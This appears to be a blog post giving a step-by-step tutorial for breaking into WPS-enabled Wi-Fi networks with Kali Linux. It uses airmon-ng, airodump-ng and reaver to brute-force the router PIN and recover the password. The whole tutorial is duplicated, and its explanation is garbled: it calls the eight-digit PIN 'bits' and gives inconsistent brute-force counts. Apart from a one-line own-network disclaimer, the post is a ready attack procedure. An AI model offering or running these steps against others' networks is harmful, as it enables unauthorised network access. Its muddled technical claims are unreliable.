YES. ! it is very easy to hack a wireless network. Even the highly secured ones. All it takes is a person who knows what he is doing and a few tools in his hands. We can't protect ourselves much if we don't know how easy it is to crack in. We are going to use KALI LINUX ( successor of the famous pene-tester tool , BACKTRACK ) for the purpose.
Often we people enable the WPS pin on our routers, for the sake of easy connectivity . But a certain loophole in the WPS system enables us to hack into the system very easily using brute force method. Generally it takes 3 to 4 hours if we are close to the router and have a good network card installed in our system.
The WPS pin is of 8 bits, the first 7 bits are actually the PIN , and the 8th bit is the checksum for it,
The loophole in this system enables a user to know if the first half of the PIN is a correct match. we can get there in merely 10000 comparisons . while the next 3 bits can be brute forced in 1000 comparisons. Thus , in a total of 11000 comparisons , we can easily get into the network.
How to test (hack) the network :
First of all, I am assuming that you are doing this on your own network, as hacking into anyone else's system is against the law.
All we need is a system running kali linux or backtrack , either live or on hard disk. Actually any linux system will do the job , but the kali linux has all the tools pre installed .
( we don't have to spoof our MAC address , as we are hacking our own network ).
1. Boot into the system as root.
2. Open up the terminal.
3. Disconnect from any known wifi network.
4. Type " ifconfig " . without the quotes. It'll display the adaptors your system has. note down the one that looks like " wlanX" . mine shows Wlan0.
5. Type " airmon-ng start wlanX " replace X by whatever showed up in your system.
6. Now the monitor mode must be enabled there. something of type "mon0 or mon1 " . note it down. mine showed mon0.
7. Type " airodump-ng mon0 " (or mon1 or whatever it was in your case).
8. Now the screen shows all the networks in your area.
9. Hit Ctrl+C when you see your network.
10. Copy the MAC address of your network . ( should be shown in the leftmost column ).
11. Type " reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv " ( it is obvious that the xx:xx:xx:xx:xx:xx is to be replaced by the MAC of your router that you had copied in the earlier step.
12. now sit back and watch the reaver do its job.
It shall return the password of your wifi in 3-4 hours. Can take more too, depending on the network distance.
Here I have assumed you know the basics of Linux and some networking concepts. Ask in the comments if there's anything.
Often we people enable the WPS pin on our routers, for the sake of easy connectivity . But a certain loophole in the WPS system enables us to hack into the system very easily using brute force method. Generally it takes 3 to 4 hours if we are close to the router and have a good network card installed in our system.
The WPS pin is of 8 bits, the first 7 bits are actually the PIN , and the 8th bit is the checksum for it,
The loophole in this system enables a user to know if the first half of the PIN is a correct match. we can get there in merely 10000 comparisons . while the next 3 bits can be brute forced in 1000 comparisons. Thus , in a total of 11000 comparisons , we can easily get into the network.
How to test (hack) the network :
First of all, I am assuming that you are doing this on your own network, as hacking into anyone else's system is against the law.
All we need is a system running kali linux or backtrack , either live or on hard disk. Actually any linux system will do the job , but the kali linux has all the tools pre installed .
( we don't have to spoof our MAC address , as we are hacking our own network ).
1. Boot into the system as root.
2. Open up the terminal.
3. Disconnect from any known wifi network.
4. Type " ifconfig " . without the quotes. It'll display the adaptors your system has. note down the one that looks like " wlanX" . mine shows Wlan0.
5. Type " airmon-ng start wlanX " replace X by whatever showed up in your system.
6. Now the monitor mode must be enabled there. something of type "mon0 or mon1 " . note it down. mine showed mon0.
7. Type " airodump-ng mon0 " (or mon1 or whatever it was in your case).
8. Now the screen shows all the networks in your area.
9. Hit Ctrl+C when you see your network.
10. Copy the MAC address of your network . ( should be shown in the leftmost column ).
11. Type " reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv " ( it is obvious that the xx:xx:xx:xx:xx:xx is to be replaced by the MAC of your router that you had copied in the earlier step.
12. now sit back and watch the reaver do its job.
It shall return the password of your wifi in 3-4 hours. Can take more too, depending on the network distance.
Here I have assumed you know the basics of Linux and some networking concepts. Ask in the comments if there's anything.
No comments:
Post a Comment